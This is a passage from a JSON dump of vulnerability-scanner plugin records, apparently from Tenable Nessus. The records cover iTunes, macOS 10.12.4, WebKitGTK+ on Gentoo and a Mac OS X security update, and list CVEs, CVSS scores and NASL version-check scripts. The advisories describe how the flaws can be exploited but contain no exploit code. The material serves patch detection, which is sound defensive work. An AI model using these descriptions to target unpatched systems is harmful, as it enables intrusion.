(CVE-2017-2479)\n - A flaw exists that allows a UXSS attack. This flaw exists because the program does not properly revalidate the 'SubframeLoader::requestFrame()' function in 'WebCore/loader/SubframeLoader.cpp'. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2480)", "cvss3": {"score": 5.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "iTunes < 12.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*"], "id": "700114.PRM", "href": "https://www.tenable.com/plugins/nnm/700114", "sourceData": "Binary data 700114.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T15:09:49", "description": "The remote host is running a version of macOS that is 10.12.x prior to 10.12.4. It is, therefore, affected by multiple vulnerabilities in multiple components, some of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. 
The affected components are as follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", 
"CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:macos"], "id": "MACOS_10_12_4.NASL", "href": "https://www.tenable.com/plugins/nessus/99134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99134);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-3619\",\n \"CVE-2016-4688\",\n \"CVE-2016-5387\",\n \"CVE-2016-5636\",\n \"CVE-2016-7056\",\n \"CVE-2016-7585\",\n \"CVE-2016-7922\",\n \"CVE-2016-7923\",\n \"CVE-2016-7924\",\n \"CVE-2016-7925\",\n \"CVE-2016-7926\",\n \"CVE-2016-7927\",\n \"CVE-2016-7928\",\n \"CVE-2016-7929\",\n \"CVE-2016-7930\",\n \"CVE-2016-7931\",\n \"CVE-2016-7932\",\n \"CVE-2016-7933\",\n \"CVE-2016-7934\",\n \"CVE-2016-7935\",\n \"CVE-2016-7936\",\n \"CVE-2016-7937\",\n 
\"CVE-2016-7938\",\n \"CVE-2016-7939\",\n \"CVE-2016-7940\",\n \"CVE-2016-7973\",\n \"CVE-2016-7974\",\n \"CVE-2016-7975\",\n \"CVE-2016-7983\",\n \"CVE-2016-7984\",\n \"CVE-2016-7985\",\n \"CVE-2016-7986\",\n \"CVE-2016-7992\",\n \"CVE-2016-7993\",\n \"CVE-2016-8574\",\n \"CVE-2016-8575\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2016-9533\",\n \"CVE-2016-9535\",\n \"CVE-2016-9536\",\n \"CVE-2016-9537\",\n \"CVE-2016-9538\",\n \"CVE-2016-9539\",\n \"CVE-2016-9540\",\n \"CVE-2016-9586\",\n \"CVE-2016-9935\",\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2017-2379\",\n \"CVE-2017-2381\",\n \"CVE-2017-2388\",\n \"CVE-2017-2390\",\n \"CVE-2017-2398\",\n \"CVE-2017-2401\",\n \"CVE-2017-2402\",\n \"CVE-2017-2403\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2408\",\n \"CVE-2017-2409\",\n \"CVE-2017-2410\",\n \"CVE-2017-2413\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2418\",\n \"CVE-2017-2420\",\n \"CVE-2017-2421\",\n \"CVE-2017-2422\",\n \"CVE-2017-2423\",\n \"CVE-2017-2425\",\n \"CVE-2017-2426\",\n \"CVE-2017-2427\",\n \"CVE-2017-2428\",\n \"CVE-2017-2429\",\n \"CVE-2017-2430\",\n \"CVE-2017-2431\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2436\",\n \"CVE-2017-2437\",\n \"CVE-2017-2438\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2443\",\n \"CVE-2017-2448\",\n \"CVE-2017-2449\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2467\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2477\",\n \"CVE-2017-2478\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2489\",\n \"CVE-2017-2490\",\n \"CVE-2017-5029\",\n \"CVE-2017-5202\",\n \"CVE-2017-5203\",\n \"CVE-2017-5204\",\n 
\"CVE-2017-5205\",\n \"CVE-2017-5341\",\n \"CVE-2017-5342\",\n \"CVE-2017-5482\",\n \"CVE-2017-5483\",\n \"CVE-2017-5484\",\n \"CVE-2017-5485\",\n \"CVE-2017-5486\",\n \"CVE-2017-6974\",\n \"CVE-2017-7070\"\n );\n script_bugtraq_id(\n 85919,\n 91247,\n 91816,\n 94572,\n 94650,\n 94742,\n 94744,\n 94745,\n 94746,\n 94747,\n 94753,\n 94754,\n 94846,\n 94968,\n 94972,\n 94975,\n 94977,\n 95019,\n 95076,\n 95077,\n 95078,\n 95375,\n 95764,\n 95768,\n 95774,\n 95783,\n 95852,\n 96767,\n 97132,\n 97134,\n 97137,\n 97140,\n 97146,\n 97147,\n 97300,\n 97301,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. 
The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nif (version !~ \"^10\\.12($|[^0-9])\") audit(AUDIT_OS_NOT, \"Mac OS 10.12.x\");\n\nfixed_version = \"10.12.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n xss:TRUE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:36", "description": "The remote host is affected by the vulnerability described in GLSA-201706-15 (WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attack can use multiple vectors to execute arbitrary code or cause a denial of service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2330", "CVE-2015-7096", "CVE-2015-7098", "CVE-2016-1723", "CVE-2016-1724", "CVE-2016-1725", "CVE-2016-1726", "CVE-2016-1727", "CVE-2016-1728", "CVE-2016-4692", "CVE-2016-4743", "CVE-2016-7586", "CVE-2016-7587", "CVE-2016-7589", "CVE-2016-7592", "CVE-2016-7598", "CVE-2016-7599", "CVE-2016-7610", "CVE-2016-7611", "CVE-2016-7623", "CVE-2016-7632", "CVE-2016-7635", "CVE-2016-7639", "CVE-2016-7640", "CVE-2016-7641", "CVE-2016-7642", "CVE-2016-7645", "CVE-2016-7646", "CVE-2016-7648", "CVE-2016-7649", "CVE-2016-7652", "CVE-2016-7654", "CVE-2016-7656", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2350", "CVE-2017-2354", "CVE-2017-2355", "CVE-2017-2356", "CVE-2017-2362", "CVE-2017-2363", "CVE-2017-2364", "CVE-2017-2365", "CVE-2017-2366", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2371", "CVE-2017-2373", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2496", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2510", "CVE-2017-2514", "CVE-2017-2515", "CVE-2017-2521", 
"CVE-2017-2525", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2539", "CVE-2017-2544", "CVE-2017-2547", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201706-15.NASL", "href": "https://www.tenable.com/plugins/nessus/100675", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201706-15.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100675);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-2330\", \"CVE-2015-7096\", \"CVE-2015-7098\", \"CVE-2016-1723\", \"CVE-2016-1724\", \"CVE-2016-1725\", \"CVE-2016-1726\", \"CVE-2016-1727\", \"CVE-2016-1728\", \"CVE-2016-4692\", \"CVE-2016-4743\", \"CVE-2016-7586\", \"CVE-2016-7587\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7598\", \"CVE-2016-7599\", \"CVE-2016-7610\", \"CVE-2016-7611\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7640\", \"CVE-2016-7641\", \"CVE-2016-7642\", \"CVE-2016-7645\", \"CVE-2016-7646\", \"CVE-2016-7648\", \"CVE-2016-7649\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2367\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2376\", 
\"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\", \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\", \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\", \"CVE-2017-2481\", \"CVE-2017-2496\", \"CVE-2017-2504\", \"CVE-2017-2505\", \"CVE-2017-2506\", \"CVE-2017-2508\", \"CVE-2017-2510\", \"CVE-2017-2514\", \"CVE-2017-2515\", \"CVE-2017-2521\", \"CVE-2017-2525\", \"CVE-2017-2526\", \"CVE-2017-2528\", \"CVE-2017-2530\", \"CVE-2017-2531\", \"CVE-2017-2536\", \"CVE-2017-2539\", \"CVE-2017-2544\", \"CVE-2017-2547\", \"CVE-2017-2549\", \"CVE-2017-6980\", \"CVE-2017-6984\");\n script_xref(name:\"GLSA\", value:\"201706-15\");\n\n script_name(english:\"GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201706-15\n(WebKitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attack can use multiple vectors to execute arbitrary code or\n cause a denial of service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201706-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.16.3:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.16.3\"), vulnerable:make_list(\"lt 2.16.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-12T16:43:38", "description": "The remote host is running a version of Mac OS X 10.10.5 or 10.11.6 that is missing a security update. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the LibreSSL component due to a flaw in the ECDSA implementation that is triggered when not properly setting a flag in ECDSA signing nonces to indicate that only constant-time code paths should be followed. An unauthenticated, remote attacker can exploit this to conduct side-channel cache-timing attacks, allowing the attacker to recover the modular inversion state sequences and the ECDSA private keys. Note that this vulnerability does not affect Mac OS X 10.10.5.\n (CVE-2016-7056)\n\n - An integer overflow condition exists in the ImageIO component due to improper validation of user-supplied input. 
An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted JPEG file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)\n\n - Multiple memory corruption issues exist in the libxslt component that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2477)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted file, to cause an out-of-bounds write, potentially allowing the execution of arbitrary code.\n (CVE-2017-5029)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2017-001", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4688", "CVE-2016-7056", "CVE-2017-2432", "CVE-2017-2477", "CVE-2017-5029"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2017-001.NASL", "href": "https://www.tenable.com/plugins/nessus/99135", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99135);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2016-4688\",\n \"CVE-2016-7056\",\n \"CVE-2017-2432\",\n \"CVE-2017-2477\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 94572,\n 95375,\n 96767,\n 97137,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2017-001\");\n script_summary(english:\"Checks for the presence of Security Update 2017-001.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS 
X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.5 or 10.11.6\nthat is missing a security update. It is therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n LibreSSL component due to a flaw in the ECDSA\n implementation that is triggered when not properly\n setting a flag in ECDSA signing nonces to indicate that\n only constant-time code paths should be followed. An\n unauthenticated, remote attacker can exploit this to\n conduct side-channel cache-timing attacks, allowing the\n attacker to recover the modular inversion state\n sequences and the ECDSA private keys. Note that this\n vulnerability does not affect Mac OS X 10.10.5.\n (CVE-2016-7056)\n\n - An integer overflow condition exists in the ImageIO\n component due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n JPEG file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2432)\n\n - Multiple memory corruption issues exist in the libxslt\n component that allow an unauthenticated, remote attacker\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2477)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to cause an out-of-bounds write,\n potentially allowing the execution of arbitrary code.\n (CVE-2017-5029)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-001 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 